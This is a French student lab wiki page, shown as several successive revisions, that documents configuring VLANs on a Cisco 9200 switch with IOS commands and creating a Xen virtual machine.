'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==Création de notre VM==<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su -<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56181TP sysres IMA5 2021/2022 G72021-10-25T14:25:37Z<p>Avercaem : </p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56178TP sysres IMA5 2021/2022 G72021-10-25T14:23:49Z<p>Avercaem : /* Paramétrage des VLANs */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56173TP sysres IMA5 2021/2022 G72021-10-25T14:17:29Z<p>Avercaem : /* Paramétrage des VLANs */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port Te1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int te1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int te6/4<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56171TP sysres IMA5 2021/2022 G72021-10-25T14:15:15Z<p>Avercaem : /* Paramétrage des VLANs */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port Te1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int te1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
enable<br />
conf t<br />
vlan 131<br />
name internet<br />
exit<br />
int vlan 131<br />
no shut<br />
ip address 192.168.222.12 255.255.255.248<br />
exit<br />
int te6/4<br />
no shut<br />
switchport mode access<br />
switchport access vlan 131<br />
exit<br />
exit<br />
write</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56169TP sysres IMA5 2021/2022 G72021-10-25T14:13:07Z<p>Avercaem : </p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port Te1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int te1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56158TP sysres IMA5 2021/2022 G72021-10-25T14:07:00Z<p>Avercaem : /* Paramétrage des VLANs */</p>
<hr />
<div><br />
== PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert ==<br />
<br />
==Configuration IPV4==<br />
<br />
=== Paramétrage des VLANs ===<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port Te1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int te1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write</div>Avercaem